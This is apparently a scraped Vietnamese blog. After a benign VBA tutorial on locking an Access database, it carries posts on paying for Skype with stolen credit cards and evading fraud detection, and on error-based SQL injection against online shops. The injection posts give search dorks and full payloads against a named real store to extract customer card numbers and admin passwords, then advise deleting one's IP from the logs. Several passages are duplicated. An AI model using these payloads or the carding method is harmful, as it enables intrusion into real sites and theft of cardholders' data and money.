1. Bảo vệ mã lệnh VBA (Visual Basic for Application) bằng cách chọn mục Properties trên trình đơn Tools của cửa sổ soạn thảo Microsoft Visual Basic rồi chọn trang Protection trên hộp thoại Project Properties. Cuối cùng, chọn Lock project for viewing, kèm theo là mật khẩu bảo vệ. Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được xem và sửa đổi.
2. Dùng chức năng Make MDE file để ngăn không cho sửa đổi mã lệnh, thiết kế biểu mẫu (form) và thiết kế báo biểu (report). Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được lấy đi để chuyển vào tập tin .MDB khác mà xem và sửa đổi.
3. Dùng chức năng Encrypt / Decrypt database… để mã hóa CSDL, ngăn không cho các chương trình tiện ích hay xử lý văn bản giải mã nhưng vẫn có thể dùng Access để mở.
4. Dùng chức năng Set database password để quy định mật khẩu cho CSDL. Cách này hơi phiền nếu có một bảng trong CSDL khác liên kết (link) với nó. Nếu quên mật khẩu thì … khóc luôn chứ sao!
5. Thiết kế một biểu mẫu khởi động, trong đó yêu cầu cho biết tên và mật khẩu, dùng hộp thoại Startup (từ danh sách Display Form/Page) để quy định phải mở biểu mẫu này trước tiên mỗi lần mở CSDL. Nhờ cách này, ta có thể giấu luôn cửa sổ Database, nơi có thể xem và chọn các thành phần của CSDL để sửa chữa.
Trong những cách trên, cách thứ 5 vẫn có thể bị vượt qua bằng cách nhấn và giữ phím Shift trong lúc mở CSDL. Để khắc phục, ta có thể dùng Visual Basic gán trị False cho thuộc tính AllowBypassKey để vô hiệu hóa phím Shift khi mở CSDL.
Giả sử bạn có một CSDL tên dbLock.MDB. Mỗi lần người ta mở nó, bạn muốn biểu mẫu frmKhoiDong luôn được hiển thị trước tiên bằng cách xác định Display Form/Page là frmKhoiDong. Để thay đổi thuộc tính AllowBypassKey, bắt buộc phải mở CSDL, gán trị mới cho thuộc tính này, đóng CSDL lại thì lần mở sau mới có ép-phê. Bạn nhớ, cần khóa làm sao để người ta không mở được mà mình mở được, nghĩa là ta phải có chìa khóa để mở. Chìa ở đây chính là một biểu mẫu khác, chẳng hạn có tên là frmChiaKhoa.
Khi đã thay đổi thuộc tính AllowBypassKey được rồi, chắc chắn biểu mẫu frmKhoiDong được hiển thị khi mở CSDL. Cho nên ta đặt chìa khóa thông qua biểu mẫu này bằng cách vẽ một ô điều khiển nào đấy (miễn sao nó có thủ tục xử lý tình huống Click là được), chẳng hạn nhãn lblChiaKhoa, rồi đặt thuộc tính Visible là No và thêm dòng lệnh DoCmd.OpenForm “frmChiaKhoa” vào thủ tục xử lý tình huống Click. Bạn phải nhớ vị trí nhãn lblChiaKhoa để lôi chìa khóa ra nhé. Như vậy, vấn đề còn lại nằm ở biểu mẫu frmChiaKhoa.
Bạn mở cửa sổ soạn thảo Microsoft Visual Basic, chọn mục References… để bảo đảm Microsoft DAO xx.xx Object Library (trong đó, phiên bản xx.xx có thể là: 2.5 hoặc 3.51 hoặc 3.6 tùy theo phiên bản Access, dĩ nhiên nên chọn phiên bản mới nhất) đã được chọn trong danh sách Available References.
Hình 1: Biểu mẫu cần thiết kế
Hình 1 là biểu mẫu frmChiaKhoa cần thiết kế, bao gồm một ô văn bản txtPassword để nhận mật khẩu mà người cần mở khóa phải gõ vào, một nút lệnh cmdLock thực hiện việc khóa CSDL và một nút lệnh cmdUnlock thực hiện việc mở khóa CSDL. Xong, bạn gõ các thủ tục xử lý như đoạn mã 1. Trước khi quậy chuyện này trên một CSDL, bạn nên sao chép phòng hờ CSDL để tránh sự cố khóa được rồi nhưng không mở được (do bạn gõ nhầm các dòng lệnh).
Đoạn mã 1
'Hàm ChangeProperty thay đổi các thuộc tính của CSDL
Function ChangeProperty(strPropName, varPropType, varPropValue)
Dim dbs As Database, prp As Property
Const conPropNotFoundError = 3270
Set dbs = CurrentDb
On Error GoTo Change_XuLyLoi
dbs.Properties(strPropName) = varPropValue
ChangeProperty = True
Change_KetThuc:
Exit Function
Change_XuLyLoi:
'Thuộc tính không thấy
If Err = conPropNotFoundError Then
Set prp = dbs.CreateProperty(strPropName, _
varPropType, varPropValue)
dbs.Properties.Append prp
Resume Next
Else
'Không biết lỗi gì
ChangeProperty = False
Resume Change_KetThuc
End If
End Function
'Xử lý tình huống chọn nút [Khóa database]
Private Sub cmdLock_Click()
‘Biểu mẫu này được nạp trước
ChangeProperty "StartupForm", dbText, "frmKhoiDong"
ChangeProperty "StartupShowDBWindow", dbBoolean, False
ChangeProperty "StartupShowStatusBar", dbBoolean, False
ChangeProperty "AllowBuiltinToolbars", dbBoolean, False
ChangeProperty "AllowFullMenus", dbBoolean, False
ChangeProperty "AllowBreakIntoCode", dbBoolean, False
ChangeProperty "AllowSpecialKeys", dbBoolean, False
‘Không cho xài phím Shift để bỏ qua biểu mẫu frmKhoiDong
ChangeProperty "AllowBypassKey", dbBoolean, False
MsgBox "Cơ sở dữ liệu đã được khóa! Đóng cơ sở dữ liệu, ê.", vbOKOnly, " Security"
cmdExit.SetFocus
cmdUnlock.Visible = True
cmdLock.Visible = False
End Sub
'Xử lý tình huống chọn nút [Mở database]
Private Sub cmdUnlock_Click()
‘Không cần biểu mẫu khởi động nữa
ChangeProperty "StartupForm", dbText, ""
ChangeProperty "StartupShowDBWindow", dbBoolean, True
ChangeProperty "StartupShowStatusBar", dbBoolean, True
ChangeProperty "AllowBuiltinToolbars", dbBoolean, True
ChangeProperty "AllowFullMenus", dbBoolean, True
ChangeProperty "AllowBreakIntoCode", dbBoolean, True
ChangeProperty "AllowSpecialKeys", dbBoolean, True
ChangeProperty "AllowBypassKey", dbBoolean, True
MsgBox "Cơ sở dữ liệu đã được mở khóa ! _
Đóng cơ sở dữ liệu,.", _
vbOKOnly, " Security"
cmdExit.SetFocus
txtPassword = ""
cmdLock.Visible = True
cmdUnlock.Visible = False
txtPassword.Visible = False
End Sub
'Xử lý tình huống khi mở biểu mẫu
Private Sub Form_Open(Cancel As Integer)
Dim dbs As Database
Set dbs = CurrentDb
On Error GoTo KhongCoThuocTinh_Err
If dbs.Properties("AllowBypassKey") Then
cmdLock.Visible = True
txtPassword.Visible = False
Else
cmdLock.Visible = False
txtPassword.Visible = True
End If
Exit Sub
KhongCoThuocTinh_Err:
cmdLock.Visible = True
txtPassword.Visible = False
End Sub
'Khi người ta gõ mật khẩu và nhấn phím Enter
Private Sub txtPassword_LostFocus()
If txtPassword = "echip" Then
cmdUnlock.Visible = True
End If
End Sub
Thứ Hai, 19 tháng 1, 2009
Tut reg skype phone
Vì thấy nhu cầu 1 số bạn cần gọi điện mà lại biết reg skype nên tớ viết bài này hướng dẫn cho cách reg thế nào cho qua skype!
1. Chọn 1 em sock us, speed nhanh 1 tí! download + cài đặt trên sock luôn (BL của sock ko quan trọng).
2. Creat account xong vào phoneout của nó, mua hẳn trên chương trình gọi điện luôn, dùng 1 con master cvv để mua.
3. Phần info chủ thẻ ko quan trọng quan trọng là phần payment của nó, có nghĩa là lần đầu pay ko được thì lần sau ko cần đổi info chủ thẻ, cứ vào thẳng payment mà bem. Nên để auto-charge, nghĩa là khi < 2$ nó sẽ tự động nộp thêm 10$ cho mình tiếp.
Nếu nó hiện ra thankyou. Ok tiền đã vào tài khoản và xài con sock đó gọi luôn và sock die thì phải thay sock khác gọi, gọi bang ip vn la block luôn! Có cách gọi skype ko cần fake nhưng reg phức tạp hơn 1 tí. Tớ sẽ làm 1 tut sau.
Còn nếu nó bi failed. Lý do có thể là do cc đó đã reg skype rồi mà trong thời gian gần đây. Hoặc do computer của bạn đã bị record. Có 2 loại record của skype, thứ nhất là record key window, cái này do mình reg và pay nhiều lần trong thời gian ngắn, cái này thì chỉ cần change key window là ok. Còn cái record thứ 2 là nó record series của HDD ổ mà bạn cài skype. Dù có reg thành công nhưng khi gọi bi blocked ngay! Mình sẽ share luôn tool đổi series ổ cứng cho các bạn luôn!
link tool change key window: http://rilwis.info/softs/keywin+changekey.rar
link tool change series HDD : http://rilwis.info/softs/Volumeserial_src.rar
1. Chọn 1 em sock us, speed nhanh 1 tí! download + cài đặt trên sock luôn (BL của sock ko quan trọng).
2. Creat account xong vào phoneout của nó, mua hẳn trên chương trình gọi điện luôn, dùng 1 con master cvv để mua.
3. Phần info chủ thẻ ko quan trọng quan trọng là phần payment của nó, có nghĩa là lần đầu pay ko được thì lần sau ko cần đổi info chủ thẻ, cứ vào thẳng payment mà bem. Nên để auto-charge, nghĩa là khi < 2$ nó sẽ tự động nộp thêm 10$ cho mình tiếp.
Nếu nó hiện ra thankyou. Ok tiền đã vào tài khoản và xài con sock đó gọi luôn và sock die thì phải thay sock khác gọi, gọi bang ip vn la block luôn! Có cách gọi skype ko cần fake nhưng reg phức tạp hơn 1 tí. Tớ sẽ làm 1 tut sau.
Còn nếu nó bi failed. Lý do có thể là do cc đó đã reg skype rồi mà trong thời gian gần đây. Hoặc do computer của bạn đã bị record. Có 2 loại record của skype, thứ nhất là record key window, cái này do mình reg và pay nhiều lần trong thời gian ngắn, cái này thì chỉ cần change key window là ok. Còn cái record thứ 2 là nó record series của HDD ổ mà bạn cài skype. Dù có reg thành công nhưng khi gọi bi blocked ngay! Mình sẽ share luôn tool đổi series ổ cứng cho các bạn luôn!
link tool change key window: http://rilwis.info/softs/keywin+changekey.rar
link tool change series HDD : http://rilwis.info/softs/Volumeserial_src.rar
Thứ Sáu, 16 tháng 1, 2009
Hack CC co ban
thấy nhiều chú nhàn rỗi quá, toàn ngồi chờ post cc để ăn thôi
nên post bài này để cho các chú chỉ việc copy và paste
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Quote:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'wow đẹp quá thử thêm cái ' xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'ố là la cái j thế này
Quote:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Quote:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Quote:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Quote:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Quote:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
lưu ý: quay lại trang admin vào Log History xóa cái ip của mình đi đừng hỏi cái này
nên post bài này để cho các chú chỉ việc copy và paste
đầu tiên lên google.còm tìm mấy từ khóa sau<< cái này ko được lười đâu đấy
Quote:
shopexd.asp?id=xxx
shoptellafriend.asp?id=xxx
shopdisplayproducts.asp?id=xxx
mấy cái xxx thay = những con số nhé
vd ở đây kiếm được cái
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'wow đẹp quá thử thêm cái ' xem nào
Code:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17'ố là la cái j thế này
Quote:
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' and hide=0 and (p.productmatch=' or p.productmatch is null) order by pother1,specialoffer desc,cname'.
/webstore/shop$db.asp, line 465
ở đây để cho các chú lười khó hiểu tớ cho luôn cái câu query để lấy cc
Quote:
or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,orderid),'N ULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b' /'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL')) from orders where orderid not in ('1') order by orderid desc))--sp_password
//passadmin
áp dụng vào cái shop trên nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20%20or%201=convert( int,(select%20top%201%20convert(varchar,isnull(con vert(varchar,orderid),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,odate), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ofirstn ame),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,olastna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oaddres s),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocity), 'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ostate) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ophone) ,'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,opostco de),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocountr y),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardna me),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardad dress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardty pe),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardno ),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,ocardex pires),'NULL'))%2b'%20/'%2bconvert(varchar,isnull(convert(varchar,oauthor ization),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,oemail) ,'NULL'))%20from%20orders%20where%20orderid%20not% 20in%20%20('1')%20order%20by%20orderid%20desc))--sp_password
tiếp theo lấy pass của thằng admin cái chơi
câu lệnh
Quote:
and 1=convert(int,(select top 1 fldusername%2b' // '%2bfldPassword from tbluser))--sp_password
thử xem nào
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17and%201=convert(int,( select%20top%201%20fldusername%2b'%20//%20'%2bfldPassword%20from%20tbluser))--sp_password
vậy là được user name và password của thằng admin rồi. nhưng còn link login thì sao nhỉ? >>> đưa câu lệnh sau vào xem thế nào
Quote:
and 1=convert(int,(select top 1 fieldname%2b' // '%2bfieldvalue from configuration where fieldname not in ('affallowaffiliatesrevieworders','affcommissionin cludesallorders','affcommissionIncludesshipping',' affcommissionrate','affdirecturl','affinfourl','af fpaymenttypes','affsubject','afftemplateaffiliate' ,'afftemplateMerchant','affwebsite','xaddcatalogid ','xaddproductsubcategorybycategory','xaddproducts upplierdropdown','xadminmenucheck','xadminrestrict products')))--sp_password
he he cái gì đây
Quote:
http://www.jackelscollection.com/webstore/shopdisplayproducts.asp?id=17%20and%201=convert(in t,(select%20top%201%20fieldname%2b'%20//%20'%2bfieldvalue%20from%20configuration%20where%2 0fieldname%20not%20in%20('affallowaffiliatesreview orders','affcommissionincludesallorders','affcommi ssionIncludesshipping','affcommissionrate','affdir ecturl','affinfourl','affpaymenttypes','affsubject ','afftemplateaffiliate','afftemplateMerchant','af fwebsite','xaddcatalogid','xaddproductsubcategoryb ycategory','xaddproductsupplierdropdown','xadminme nucheck','xadminrestrictproducts')))--sp_password
vậy là có link login vào nhé vào rồi thì làm sao nhỉ? à nếu chỉ muốn kiếm cc thôi thì sau khi login vào trang admin vào Advanced Query
gõ hoặc copy
Quote:
select * from orders
hà hà đơn giản chỉ thế thôi đương nhiên là các bạn nên dùng thêm mệnh đề where để tìm những cc nào còn hạn sử dụng và thay * = những trường cụ thể để đỡ rối mắt, và cái shop admin này còn nhiều thứ để nghịch ngợm lắm
lưu ý: quay lại trang admin vào Log History xóa cái ip của mình đi đừng hỏi cái này
HƯỚNG DẪN HACK SHOP BẰNG SQL INJECTION
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở http://www.google.com/ hoặc http://www.search.com/ Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id="hoặc search theo domain allinurl:”.com/shopdisplayproducts.asp?id= "bạn có thể thay .com bằng .net,.biz ,.us.....vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9"
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ' .
http://www.victim.com/shopping/shopdisplay...asp?id=153'
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem http://www.victim.com/shopping/shopdisplay...sp?cat=153'
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi. Bạn nhìn kỹ nhé -----> Unclosed quotation mark before the character string đối với lỗi này ta sẽ dùng and 1=convert , Còn nếu nó báo thế này
CODE
Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93
Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
bạn xoá dấu ' rồi thêm dòng query này vào phía sau
ta được như thế này
http://www.victim.com/shopping/shopd...from%20informa tion_schema.tables))--sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
kết quả 'ver_Faq' là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'coupons' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Ta cứ lấy tiếp như vậy :
http://www.victim.com/shopping/shopd...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password
Bước II : lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers..........Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser')))--sp_password
ta được thế nàyhttp://www.victim.com/shopping/shopd...cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser')))--sp_password
Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldauto' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) --sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldusername' to a column of data type int./shopping/shopdisplayproducts.asp, line 93
Lấy column tiếp theo :and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbluser') and column_name not in ('fldauto','fldusername')))--sp_password
http://www.victim.com/shopping/shopdisplay...d%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f ldusername')))--sp_password
Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Ok được rồi, giờ ta lấy username và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> username là admin
_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93----------> pass là 1234
Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin/1234' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column 'fldpassword' mà không biết nó ở đâu .Ta thử search tại Table đầu tiên 'ver_Faq'
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('ver_Faq') and column_name like ('%25pass%25')))--sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ "pass"
Trích :
No products match your search
Oh vậy là table 'ver_Faq' ko có column nào mà tên của nó có chứa chữ "pass" .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
http://www.victim.com/shopping/shopd...cts.asp?id=153
Thì link admin có thể nằm ở
http://www.victim.com/shopping/shopadmin.asp Hoặc http://www.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b'/'%2bfieldvalue from configuration where fieldname='xadminpage'))--sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xadminpage/5h0padm1n.asp' to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
